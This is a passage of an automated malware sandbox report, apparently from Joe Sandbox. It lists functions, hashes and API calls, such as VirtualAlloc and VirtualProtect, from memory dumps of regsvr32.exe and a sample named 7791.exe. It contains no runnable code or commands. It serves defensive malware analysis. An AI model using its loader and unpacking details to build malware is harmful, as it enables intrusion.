Opcode ID: e1daab80d32038f8d19c31a5ca7a06cdb57d111794fa2906d99e13b184fe08c4
Instruction ID: 256411a2ee84ca84f6dda2dac9f3405cfc0f9881aa72f9f8adfedb668dc7acc9
Opcode Fuzzy Hash: e1daab80d32038f8d19c31a5ca7a06cdb57d111794fa2906d99e13b184fe08c4
Instruction Fuzzy Hash: 0FF0F679D9608A9FC710AE29809A03CFBB2FB433A2F4C7A04D435E3792D624D019C68D

Uniqueness

Uniqueness Score: -1.00%

Function 00C61BE9 Relevance: .1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6df0a9370dac3a9a028cfdf6a495decc6fb3030a48fff5b9e21c50417849088
Instruction ID: 345f4afda22e0a91ab2480906ccc996e85fec5845ace8ee53579371a10c78f51
Opcode Fuzzy Hash: b6df0a9370dac3a9a028cfdf6a495decc6fb3030a48fff5b9e21c50417849088
Instruction Fuzzy Hash: DD116B7998A104AFD320AE1A44D753DFB72F783363F1C3629D822E3742E255D408D29A

Uniqueness

Uniqueness Score: -1.00%

Function 00C61C00 Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038b5302323f82725fa45ef56808bb8d609af8648ecce37e506648a5a0ad3360
Instruction ID: 18c5fb133c4404b577a9e853e65b51889ce3f265c50e50f0ec1b00e501cf9a0f
Opcode Fuzzy Hash: 038b5302323f82725fa45ef56808bb8d609af8648ecce37e506648a5a0ad3360
Instruction Fuzzy Hash: 7D016874D8A045AFC7209E1A44D613CFB72FB83363F1C3618D822E7752E215D004D38A

Uniqueness

Uniqueness Score: -1.00%

Function 00C61BF6 Relevance: .1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5651edc2174eea0f62bc08c8b2981debc32611d20ab1879598c3889c3f5a0af
Instruction ID: 89e9c7528ef38bea21c5fa08e6c41640088fed4546ba46ca51654f1fc2dffcd5
Opcode Fuzzy Hash: e5651edc2174eea0f62bc08c8b2981debc32611d20ab1879598c3889c3f5a0af
Instruction Fuzzy Hash: B901F73599A1459ED7209E2544DB57CFBB2FB43352F1C3659C422A7692D2118004D68A

Uniqueness

Uniqueness Score: -1.00%

Function 00C6211C Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da2bd704b46beed7407aa6e6a1334ef708c6a0352c96f6daba0263c8c114885
Instruction ID: 8e420245854fb64d7bb0dd73795b8004efa9bb9c26e220cdc0ad824e46ad580d
Opcode Fuzzy Hash: 0da2bd704b46beed7407aa6e6a1334ef708c6a0352c96f6daba0263c8c114885
Instruction Fuzzy Hash: 1D014C3140BB02C6CB149E28C7E1958F331AB13B00B082374C5425B61BE715C229C184

Uniqueness

Uniqueness Score: -1.00%

Function 00C6212F Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025ab778f1ca39843ffd5dc3b40dd82fd38cb8330d0267b189be1a00ff9278ed
Instruction ID: 1b6c135e76fbef92e31fd4b090befe0462cc450e8460dd3d75cedac135c7ee25
Opcode Fuzzy Hash: 025ab778f1ca39843ffd5dc3b40dd82fd38cb8330d0267b189be1a00ff9278ed
Instruction Fuzzy Hash: C301262185BB52D6CB149E28D7B1A58A7B5EB13F04B083774C1819BA1BE719C239C184

Uniqueness

Uniqueness Score: -1.00%

Function 00C621BA Relevance: .1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e768caa0535999f4bb10d5f4337cbf6337902a6ca4a407552e823c94571dd80d
Instruction ID: 8ee22a36259aa70c0999351754019e0334d9fd0fb69d3b1317a18ea0921a270a
Opcode Fuzzy Hash: e768caa0535999f4bb10d5f4337cbf6337902a6ca4a407552e823c94571dd80d
Instruction Fuzzy Hash: 01017D32805602E6CB01DE6CE7A2E9DF775FB13B00B042275C601AB347E325C626D544

Uniqueness

Uniqueness Score: -1.00%

Function 00C61DAD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84abc3766dc7f4abcaa66549a57c5fdb74172fff629817983a07a1f3de85555b
Instruction ID: f54cd8d3fdc8ab5fda98cd63dd6feee9adef46a469f0f007e97ebcc92de535fe
Opcode Fuzzy Hash: 84abc3766dc7f4abcaa66549a57c5fdb74172fff629817983a07a1f3de85555b
Instruction Fuzzy Hash: A2E02BA1956014EFDA21EC658890EB8A32BD747B01F5DF928D24A53307D127D4084660

Uniqueness

Uniqueness Score: -1.00%

Function 00C62123 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86402087a600d96cef9a756e1759f3b60948a3188c12d079436ecb535a395c9
Instruction ID: 7a4874fa9b46d0bc95d995b89d970d63887ca2b4cf936b3d12519c1d88d5aac9
Opcode Fuzzy Hash: c86402087a600d96cef9a756e1759f3b60948a3188c12d079436ecb535a395c9
Instruction Fuzzy Hash: 5FF02721489A42C0CB1A6E69A3B195DF334F713F00B142664C146AF657E319C229C185

Uniqueness

Uniqueness Score: -1.00%

Function 00C614E1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38054e76823687ca652bbbbe959e960a8758cf9b7157aa072ae6a2f112ab7ef6
Instruction ID: 28669b117eb56c8f9593130ca7dfc279e512c9bcb3a488e9b81fa2afcde5cf29
Opcode Fuzzy Hash: 38054e76823687ca652bbbbe959e960a8758cf9b7157aa072ae6a2f112ab7ef6
Instruction Fuzzy Hash: C79004D1DC7155114411CC411C05DFFDD35F1C3D10F4C7114514177545C750C011C05C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5984, Parent PID: 412COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 049B4EC0 Relevance: 6.5, APIs: 4, Instructions: 484
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 049B5216
VirtualProtect.KERNELBASE(?,?,?,?), ref: 049B5257
VirtualProtect.KERNELBASE(?,?,?,?), ref: 049B52A3
VirtualAlloc.KERNELBASE(?,?,?,?), ref: 049B54EC

Memory Dump Source

Source File: 0000001B.00000002.505898183.00000000049B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 049B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_49b1000_regsvr32.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: fecbb331e7db7b64677d68f4be28531890f3ba435a412a45cba28656ce7b8089
Instruction ID: b26fa4a55a092ef32f9ad745f9cdd51000c6a246bf5f012198e4b64a789b4149
Opcode Fuzzy Hash: fecbb331e7db7b64677d68f4be28531890f3ba435a412a45cba28656ce7b8089
Instruction Fuzzy Hash: 4E12C7726043419FD728CF69C990BDAB7E7FBC8314F058A2EE589CB754DB70A8058B81

Uniqueness

Uniqueness Score: -1.00%

Function 02AB22B3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 218
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 02AB2309
VirtualProtect.KERNELBASE ref: 02AB238A
VirtualProtect.KERNELBASE ref: 02AB2592

Strings

X, xrefs: 02AB25E1

Memory Dump Source

Source File: 0000001B.00000002.500563877.0000000002AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2ab0000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID: X
API String ID: 544645111-3081909835
Opcode ID: c73ba91a76be45f7027f4b5e9ffe0da2491902eebb5dce473a54bb8434283d36
Instruction ID: 9088ccdc71af748b25273fd995b117e677844fdc407182f701506f99c2b9f801
Opcode Fuzzy Hash: c73ba91a76be45f7027f4b5e9ffe0da2491902eebb5dce473a54bb8434283d36
Instruction Fuzzy Hash: 5DB1CEB4E002188FDB58CF59C990B9DBBF1FF88310F1581AAD908AB356D735A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02AB1D7B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02AB1DFB

Strings

U, xrefs: 02AB1D80

Memory Dump Source

Source File: 0000001B.00000002.500563877.0000000002AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2ab0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: U
API String ID: 4275171209-3372436214
Opcode ID: 355a043c954d226abcd44c4ef3e71c7a65a42835bfaf6c060dd569bc77432b18
Instruction ID: ab25174bc500ad8a25f5a0a58c7336724b1f4a3bc56278c31876b5cca7443de7
Opcode Fuzzy Hash: 355a043c954d226abcd44c4ef3e71c7a65a42835bfaf6c060dd569bc77432b18
Instruction Fuzzy Hash: 1E4114B49012058FDB44DFA4C1A8B9EBBF1FF48304F2085AED858AB341D7B69846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02AB1D83 Relevance: 1.3, APIs: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02AB1DFB

Memory Dump Source

Source File: 0000001B.00000002.500563877.0000000002AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2ab0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2ed19455e7972c23e4286ab6292d745ce25b53398d583e62a52d514acc74af90
Instruction ID: 8417e717be5972125420571413159dd27c6e06cf04470eb91eb113745488c203
Opcode Fuzzy Hash: 2ed19455e7972c23e4286ab6292d745ce25b53398d583e62a52d514acc74af90
Instruction Fuzzy Hash: 004135B09012058FDB44CF64C5A4BAEBBF0FF48304F24856ED858AB341D776A846CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 7791.exePID: 1824, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 0279003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0279024D

Strings

cess, xrefs: 0279018D
kernel32.dll, xrefs: 0279008F, 02790095

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0b062163da4da8698c08d9d65777322b606f2f8f89e90ca5f5619ab13f77384b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 4F527874A11229DFDB64CF68D984BACBBB1BF09314F1480D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02790E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00000400,?,?,02790223,?,?), ref: 02790E19
SetErrorMode.KERNEL32(00000000,?,?,02790223,?,?), ref: 02790E1E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e75083ef5cf135af8fd535d034f2640e4408e5747bab793bf37e20e10de5eb7d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 3ED0123515522877DB003A94DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 027AEB48 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

/, xrefs: 027AEBFC
UT, xrefs: 027AEE6F

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 46bd310eb320db06bb13ce563afccc1e9686f1bfc4b67af773e7ec171c3038fb
Instruction ID: 86f099fa9ae6126a175d4c60e3c04902cb454d524b9a5707ff2b647e2f822cd3
Opcode Fuzzy Hash: 46bd310eb320db06bb13ce563afccc1e9686f1bfc4b67af773e7ec171c3038fb
Instruction Fuzzy Hash: C302B770D042698FDF62CF28C89439E7BB1AF85324F0446F9D949AB246D7319E84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0279B36A Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0279B399
_memset.LIBCMT ref: 0279B3AA
_memset.LIBCMT ref: 0279B3BB
_memset.LIBCMT ref: 0279B3CC
_memset.LIBCMT ref: 0279B3DD
_memset.LIBCMT ref: 0279B3EE
_memset.LIBCMT ref: 0279B3FF
_memset.LIBCMT ref: 0279B410
_memset.LIBCMT ref: 0279B421

Part of subcall function 0279B17A: __EH_prolog3_GS.LIBCMT ref: 0279B184
Part of subcall function 0279B17A: _memset.LIBCMT ref: 0279B245
Part of subcall function 0279B17A: _memset.LIBCMT ref: 0279B2D7

Strings

@C, xrefs: 0279B4D7
C, xrefs: 0279B784
HD, xrefs: 0279B50E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_
String ID: @C$HD$C
API String ID: 2126626869-2685403835
Opcode ID: 9ddc173f5ef84742c0e981d281d3e6a42fc67e3329014bda458390a35814ef2e
Instruction ID: 8c5d0b9dfdc75d1eb635dcf28d8d60b4c004d178b1982c6e71bdfe1fc1db8740
Opcode Fuzzy Hash: 9ddc173f5ef84742c0e981d281d3e6a42fc67e3329014bda458390a35814ef2e
Instruction Fuzzy Hash: F0F109B784421CABEB11DBA0EC4DEDAB77CBB4D305F0408EAB609D2110DA75DB948F65

Uniqueness

Uniqueness Score: -1.00%

Function 0279C786 Relevance: 16.6, APIs: 11, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0279C7BA
_memset.LIBCMT ref: 0279C7D0
_memset.LIBCMT ref: 0279C7E1
_memset.LIBCMT ref: 0279C7F7
_memset.LIBCMT ref: 0279C808
_strtok_s.LIBCMT ref: 0279C836
_memset.LIBCMT ref: 0279C87F
_strtok_s.LIBCMT ref: 0279C96E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$_strtok_s
String ID:
API String ID: 2385434636-0
Opcode ID: affb95e43841592132d3995b3365ed03a0de8ce92fc132ec32a5cd872ec4a51f
Instruction ID: eedac05d5dcfc0d98d4e6faf32616f32455d32ed4641025b5ec825ede615973d
Opcode Fuzzy Hash: affb95e43841592132d3995b3365ed03a0de8ce92fc132ec32a5cd872ec4a51f
Instruction Fuzzy Hash: 4F515EB2C0062CEEDF169B54EC84EEAB77DEF89305B0404FAB50DE6140E6319B558F65

Uniqueness

Uniqueness Score: -1.00%

Function 0279B963 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0279B989
_memset.LIBCMT ref: 0279B99A
_memset.LIBCMT ref: 0279B9AB
_memset.LIBCMT ref: 0279B9BC

Part of subcall function 027A882B: _memset.LIBCMT ref: 027A884C

Part of subcall function 0279AA91: __EH_prolog3_GS.LIBCMT ref: 0279AA9B

Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B399
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3AA
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3BB
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3CC
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3DD
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3EE
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B3FF
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B410
Part of subcall function 0279B36A: _memset.LIBCMT ref: 0279B421

Strings

C, xrefs: 0279BA94
LD, xrefs: 0279BA2E
DD, xrefs: 0279B9FB
@C, xrefs: 0279B9E8

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_
String ID: @C$DD$LD$C
API String ID: 2126626869-1261626940
Opcode ID: 82c25d2d37b72e0c4d67faddcbba8adf46f3c7040f6755c31bd7db488a8a447e
Instruction ID: c7d0dad9dee9458cd1052dbdc755244475715f8897e0015538877c4b4ba4b9ac
Opcode Fuzzy Hash: 82c25d2d37b72e0c4d67faddcbba8adf46f3c7040f6755c31bd7db488a8a447e
Instruction Fuzzy Hash: E8511DB7D4021CABEB15DBA0EC4DEDAB77CFB4D304F0408EAB605D2110DAB59A948F65

Uniqueness

Uniqueness Score: -1.00%

Function 0279BEE1 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0279BF67
_memset.LIBCMT ref: 0279C042
_strtok_s.LIBCMT ref: 0279C0BB
_strtok_s.LIBCMT ref: 0279C161

Part of subcall function 0279BCC1: __EH_prolog3_GS.LIBCMT ref: 0279BCC8

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0279C1F2

Strings

C, xrefs: 0279BF8A

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset_strtok_s$H_prolog3_Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: C
API String ID: 1185060415-2515487769
Opcode ID: 00c4aae0e32cf5818d15bd95bbf2fe25e85c952b1aeb4591b20ddacd3887ff85
Instruction ID: 14afe4643e477b368ab0a4a15995f2367808f4496067790308b162acb657957a
Opcode Fuzzy Hash: 00c4aae0e32cf5818d15bd95bbf2fe25e85c952b1aeb4591b20ddacd3887ff85
Instruction Fuzzy Hash: 94C15CB6D0121DABDF22DFA0EC889DA77BCFB0D305F0045EAE609E2150D7359A948F56

Uniqueness

Uniqueness Score: -1.00%

Function 027A3A16 Relevance: 12.4, APIs: 8, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027A3A2F

Part of subcall function 027A3903: __EH_prolog3_GS.LIBCMT ref: 027A390A

_strcpy_s.LIBCMT ref: 027A3AD1
_strcpy_s.LIBCMT ref: 027A3B3F
_strcpy_s.LIBCMT ref: 027A3BA2
_strcpy_s.LIBCMT ref: 027A3C0F
_strcpy_s.LIBCMT ref: 027A3C9A
_strcpy_s.LIBCMT ref: 027A3CFC
_strcpy_s.LIBCMT ref: 027A3D6A

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _strcpy_s$H_prolog3H_prolog3_
String ID:
API String ID: 2444349902-0
Opcode ID: 67090c4a965b1b7e81f916dd931d8fb36284e298534b92e6612d7fafb8047577
Instruction ID: dc9754eee0518dfe11c0dc008319d37c40e784ae695ffda666fa23089f55e237
Opcode Fuzzy Hash: 67090c4a965b1b7e81f916dd931d8fb36284e298534b92e6612d7fafb8047577
Instruction Fuzzy Hash: 5FE11B7684021AAFCF01EFE4DD4CAEEBB79FF09304F004569FA12A2250D7764A14DB66

Uniqueness

Uniqueness Score: -1.00%

Function 027A452F Relevance: 12.3, APIs: 8, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 027A45FB
_memset.LIBCMT ref: 027A47B5
_memset.LIBCMT ref: 027A47C6
_memset.LIBCMT ref: 027A47D7
_memset.LIBCMT ref: 027A47E8
_memset.LIBCMT ref: 027A47F9
_memset.LIBCMT ref: 027A480A

Part of subcall function 027A4298: _memset.LIBCMT ref: 027A4352
Part of subcall function 027A4298: _memset.LIBCMT ref: 027A4364

_memset.LIBCMT ref: 027A484B

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 091a2fb6f9eb55b6818f1c123462a8d4b4eb800430ac3b3d144b9e27b4d0284f
Instruction ID: 62bd0bdf72957286f0f5f538b4e1a649d3935b866980370035f6f1f3a6b793b3
Opcode Fuzzy Hash: 091a2fb6f9eb55b6818f1c123462a8d4b4eb800430ac3b3d144b9e27b4d0284f
Instruction Fuzzy Hash: 30D169B280021DABEF21DFA4DC89EDAB77CFB49314F4401A9F608E2151E7719B948F65

Uniqueness

Uniqueness Score: -1.00%

Function 027A6DE8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027A6DEF
std::_Lockit::_Lockit.LIBCPMT ref: 027A6DF9

Part of subcall function 027A04C5: std::_Lockit::_Lockit.LIBCPMT ref: 027A04D3

std::bad_exception::bad_exception.LIBCMT ref: 027A6E48
__CxxThrowException@8.LIBCMT ref: 027A6E56
std::locale::facet::_Incref.LIBCPMT ref: 027A6E66
std::locale::facet::_Facet_Register.LIBCPMT ref: 027A6E6C

Strings

>OC, xrefs: 027A6DEA

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: >OC
API String ID: 158301680-1233146472
Opcode ID: cb5c8be342671544f3bc32da89ea019fc8bc80069566f0d4b810d4d702d000af
Instruction ID: 56013eba7da61abf8f895183980b703ce7ba1011901e8b8e00528ba46fb3821b
Opcode Fuzzy Hash: cb5c8be342671544f3bc32da89ea019fc8bc80069566f0d4b810d4d702d000af
Instruction Fuzzy Hash: B3018B71C002259ACF12EB60C828BEE7266BF81730F140B19D820B71A0EB349A018F95

Uniqueness

Uniqueness Score: -1.00%

Function 027AA8D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027AA8DF
std::_Lockit::_Lockit.LIBCPMT ref: 027AA8E9

Part of subcall function 027A04C5: std::_Lockit::_Lockit.LIBCPMT ref: 027A04D3

std::bad_exception::bad_exception.LIBCMT ref: 027AA936
__CxxThrowException@8.LIBCMT ref: 027AA944
std::locale::facet::_Incref.LIBCPMT ref: 027AA954
std::locale::facet::_Facet_Register.LIBCPMT ref: 027AA95A

Strings

>OC, xrefs: 027AA8DA

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: >OC
API String ID: 158301680-1233146472
Opcode ID: 9a49832dc0fa5cefea9063c7bd095a065dc92010373c772c4f31e1a19e88a635
Instruction ID: 32075f0c5b0c1823b8cc1e8cf8889539e068d6f797fef986ef69dd42d9d270ea
Opcode Fuzzy Hash: 9a49832dc0fa5cefea9063c7bd095a065dc92010373c772c4f31e1a19e88a635
Instruction Fuzzy Hash: 04018C31D41129ABCB12FB64C868BEE72727F81771F214715D8217B2E0DB349A05CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 027AA974 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027AA97B
std::_Lockit::_Lockit.LIBCPMT ref: 027AA985

Part of subcall function 027A04C5: std::_Lockit::_Lockit.LIBCPMT ref: 027A04D3

std::bad_exception::bad_exception.LIBCMT ref: 027AA9D2
__CxxThrowException@8.LIBCMT ref: 027AA9E0
std::locale::facet::_Incref.LIBCPMT ref: 027AA9F0
std::locale::facet::_Facet_Register.LIBCPMT ref: 027AA9F6

Strings

>OC, xrefs: 027AA976

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: >OC
API String ID: 158301680-1233146472
Opcode ID: a76c902aac66ce8a9f6a76da84942a6eea7ff2ef8da404a7c7f314b1b38f5c6d
